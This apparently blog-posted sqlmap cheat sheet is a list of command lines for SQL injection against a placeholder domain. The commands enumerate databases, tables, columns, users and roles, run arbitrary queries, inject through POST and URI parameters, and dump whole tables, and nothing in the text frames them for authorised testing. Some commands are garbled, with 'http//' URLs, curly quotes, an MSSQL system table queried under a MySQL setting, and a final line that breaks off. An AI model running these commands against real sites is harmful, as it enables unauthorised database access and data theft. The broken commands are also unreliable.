Posts

Showing posts from May, 2024

Sqlmap Cheatsheet

  NOTE : for each command using  --dbms=mysql. — — CHEAT SHEET — — # Enum DB sqlmap --dbms=mysql -u “http//domain/" --dbs # Enum tables sqlmap --dbms=mysql -u  “http//domain/"  -D target_DB --tables --current-user : enum current user --current-db : enum db name # Use POST methods sqlmap --dbms=mysql -u  “http//domain/"  --data=”data1=aaa&data2=bbb” # List of users and roles sqlmap --dbms=mysql -u  “http//domain/"  --users --roles --threads=10 # Custom Query sqlmap --dbms=mysql -u  “http//domain/"  --sql-query=”select * from master.sys.server_principals” # Dump table sqlmap --dbms=mysql -u  “http//domain/"  -D target_DB -T target_Table --dump # List columns sqlmap --dbms=mysql -u  “http//domain/"  -D target_DB -T target_Table --columns # Parameter sqlmap --dbms=mysql -u “http//.domain/param1=value1&param2=value2" --dbs -p param2 # Specify URIs sqlmap --dbms=mysql -u “http//.domain/param1/value1*/param2/value2" --dbs sqlmap -u ‘http//.